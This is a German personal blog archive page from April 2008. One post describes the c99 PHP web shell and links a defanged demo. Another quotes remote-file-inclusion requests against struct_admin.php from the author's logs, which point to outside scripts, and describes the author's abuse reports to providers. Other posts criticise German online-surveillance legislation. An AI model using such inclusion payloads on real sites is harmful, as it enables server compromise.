Monday, 7. April 2008c99-shell DemoversionDa mir die letzten Tage so viele Leute irgendwelche PHP-Dateien hochladen wollten, hab ich mir mal angesehen, was so angespült wird. Das meiste ist langweilig, aber ich hab mich auch mal mit der betagten, dabei immer noch sehr beliebten c99shell beschäftigen können. Zuerst nur in einer arabischen Version, die mir ein freundlicher Mensch aus Palästina geben wollte (wirklich ein Mensch, kein Bot, der Typ hat nach "powered +by +struct_admin.php" gesucht), aber die englische Version war auch schnell zu finden. Ich bin ganz begeistert über dieses Tool. Ich kenne kommerzielle Systemverwaltungen, deren Funktionsumfang nicht so gross ist. Die Bedienung ist einfach, die Installation geradezu ein Kinderspiel: Eine Datei hochladen und alles ist fertig, häufig merkt nicht mal der Besitzer der Seite was davon. Sogar einen Editor liefern sie mit und an Infos über den Server findet man alles, was das Herz begehrt. Für Leute, die auch mal so ein schönes Tool ausprobieren möchten, hab ich eine Demoversion gebastelt. Viel funktioniert da nicht, ein paar Mausklicks kann man aber machen. Aktive Elemente sind rausgenommen und was man da sieht, ist auch nicht dieser Server, sondern ein Rechner bei mir zuhause. Wer sich für sowas interessiert, der kann auf nebenstehenden Screenshot klicken und ein bisschen rumspielen. Quellcode muss sich natürlich jeder selber besorgen, oder installieren lassen... Sunday, 6. April 2008Das Ende ist nah!
Die beiden grossen Kirchen schliessen sich zusammen und bauen eine Arche. An der Mangfall...
Saturday, 5. April 2008Falsche Lücke
Hätte ich nur am Montag keinen Link auf ein Blog namens "blogator" gesetzt... Jetzt wird dieser Beitrag bei irgendwelchen Suchmaschinen mit diesem Begriff gefunden und jedes script kiddie probiert mal aus, ob er bei mir die Sicherheitslücke der zufällig gleichnamigen französischen Blogsoftware ausnützen kann. Ihr könnt mich damit in Ruhe lassen, ich verwende eine andere Software, die bestimmt Lücken, aber halt andere hat.
Mein Log ist jedenfalls voll von Versuchen der Art GET /2008/03/31/kurzer-ausflug-nach-25// include/struct_admin.php? incl_page= http://---irgendein-provider---/ imgcls/cmd2.txt????? Wenn man dann bei ---irgendein-provider---/ imgcls/cmd2.txt nachschaut, was da eingebunden wird, findet man ein Script, das anscheinend nur Betriebssystem, Username und Plattenplatz ausgibt. Nichts weiter tragisches, anscheinend nur die Vorbereitung spezifischerer Versuche. Die Versuche finden ausschliesslich bei diesem Beitrag statt, sind also kein Rundumschlag in irgendwelchen Blogs, sondern bestimmt das Ergebnis einer Suche bei irgendeiner Suchmaschine. Zwei dieser Webprovider hab ich mal testweise angeschrieben, dass sie ihren Kunden bitte bescheidgeben:
Die Kunden können natürlich auch wenig dafür (ausser dass sie hackbare Anwendungen ins Netz stellen), aber sie sollten wenigstens informiert sein, dass ihre Homepage über z.B. "Entgiftungspflaster mit der Kraft alter Bäume" im Nebenjob als Virenschleuder dient. Viel Erfolg versprech ich mir davon aber nicht. Bei den meisten Providern beschränkt sich das Abuse-Handling auf den Aufbau von Hürden für den Beschwerdeführer. Ausser den aufgemachten Servern mit dem Script gibts noch einen zweiten Beteiligten, den der diese URL zusammenbastelt und bei mir aufruft. Ich vermute aber, der kann auch nichts dafür, das geht auch schon automatisch ohne Wissen und Beteiligung des Menschen vor dem Monitor. Anderfalls wären die Leute entweder alle mit Textbrowsern unterwegs oder würden im Sekundentakt den Browser wechseln (oder dessen Identifikation mit jedem aufruf wechseln lassen). Wäre denkbar, aber für Kinder eher untypisch... Die Internetprovider dieser Leute kann ich allerdings nicht anschreiben. Da ich hier ja auf die Speicherung der IP-Adressen der Besucher verzichte, kann ich für vergangene Zugriffe die IP-Adresse der Besucher nur ungefähr sagen. Z.B. kommt dann ein verstümmeltes "bzrhbcesvl.schulradio-bayern.de" raus, damit brauche ich beim Provider nicht ankommen. Und aussschalten mag ich die Pseudonymisierung jetzt auch nicht, dazu werden auch bei Internetprovidern Hinweise der Art "He Dein Kunde hackt hier rum oder hat nen Virus" zu missmutig bearbeitet. Nachtrag: Die suchen bei Technorati oder Google-Blogsuche nach "blogator". 2 Stunden nach Veröffentlichung tauchen die ersten Zugriffe auf diesen Beitrag auf: /2008/04/05/falsche-luecke// _blogadata/ include/ struct_admin.php? incl_page= http:// ---egal --- /ioncube/readme.txt?? Nachtrag 2: 5 Stunden nach meiner Mail hat übrigens Geocities die Seite abgeklemmt. Ich weiss natürlich nicht, ob ich der einzige war, der was geschrieben hat, vermutlich suchen die auch selbst ihre Seiten nach Schädlingen ab. Die schnelle Reaktion hat mich jedenfalls überrascht. Friday, 4. April 2008Blinde Installation
Den passendsten Kommentar zum neuesten Scheingefecht der Koalition zur Online-Durchsuchung fand ich im Heise-Forum. Es geht jetzt darum, ob die Wanze auch auf dem Rechner installiert werden kann, wenn man technisch noch nicht so weit ist, das online zu erledigen. Dann muss der Polizist ja heimlich in die Wohnung einbrechen, den Trojaner installieren und wieder verschwinden. Die SPD findet nun dieses Detail (bis auf weiteres) untragbar und mit ihr nicht machbar, während der Innenexperte der CDU Clemens Binninger das ganz normal findet:
„Es liegt doch in der Natur der Sache, dass wir, wenn wir den Sicherheitsbehörden aus guten Gründen die Online-Durchsuchung erlauben, ihnen auch die Möglichkeit geben müssen, im Bedarfsfall physisch auf den Rechner zuzugreifen.“ Dabei handele es sich schließlich nicht um eine Durchsuchung der Wohnung des Verdächtigen, sondern lediglich um ein Betreten. „Und das ist von der heutigen Verfassungslage im Bereich der Gefahrenabwehr gedeckt.“ Und dazu meinte der FuntKlakow PC verstecken Dann reicht es also aus, den PC so zu platzieren, das man ihn nicht auf den ersten Blick sieht. Wenn er dann die Wohnung nach dem PC durchsuchen muss, handelt er rechtswidrig! ;-) Ich finde, schöner kann man die bizarre Welt in der unsere Innenexperten anscheinend leben nicht kommentieren. Tuesday, 1. April 2008Vorgaben umgesetzt
Der Ministerpräsident Beckstein erklärte heute nach der Ministerkonferrenz
"Terroristen kommunizieren heutzutage weitaus mehr als früher über Briefe und heimlich zugesteckte Zettel. Deshalb ist es dringend notwendig, die Organe der Inneren Sicherheit zu ermächtigen, heimlich in Wohnungen einzusteigen, dort alle Schubladen zu durchsuchen und so den Briefverkehr in die Hände zu bekommen." Nein, das sagte er natürlich nicht, er sprach von der Online-Kommunikation, und der Online-Datenerhebung. "Online-Datenerhebung" ist dabei der Euphemismus für eine heimliche Durchsuchung unserer Computer über das Internet. Sie haben nämlich inzwischen ihre Hausaufgaben gemacht, entgegen der ersten Annahme doch noch ein paar kleine Verbesserungen am Gesetzentwurf im Sinne des Verfassungsgerichts der Verfassung vorgenommen und wollen jetzt ihre Trojaner legal unters Volk bringen. Die Begründung ist wie üblich die Kommunikation der Bösen, das Ziel muss mehr sein: sämtliche Daten. Weil mit der Kommunikation wird ja schon die "Quellen-TKÜ", auch so ein Euphemismus, begründet. Nachtrag: Auf Bundesebene sieht man das wohl so ähnlich wie ich. Zumindest die Zöllner wollen die Quellen-TKÜ schon einsetzen. Nach Auskunft der Bundesregierung auf Basis der bestehenden Gesetze, wenn also keine neuen Gründe kommen, bräuchte es ja kein neues Gesetz...
« vorherige Seite
(Seite 3 von 3, insgesamt 15 Einträge)
|
KategorienVerwaltung des Blogs |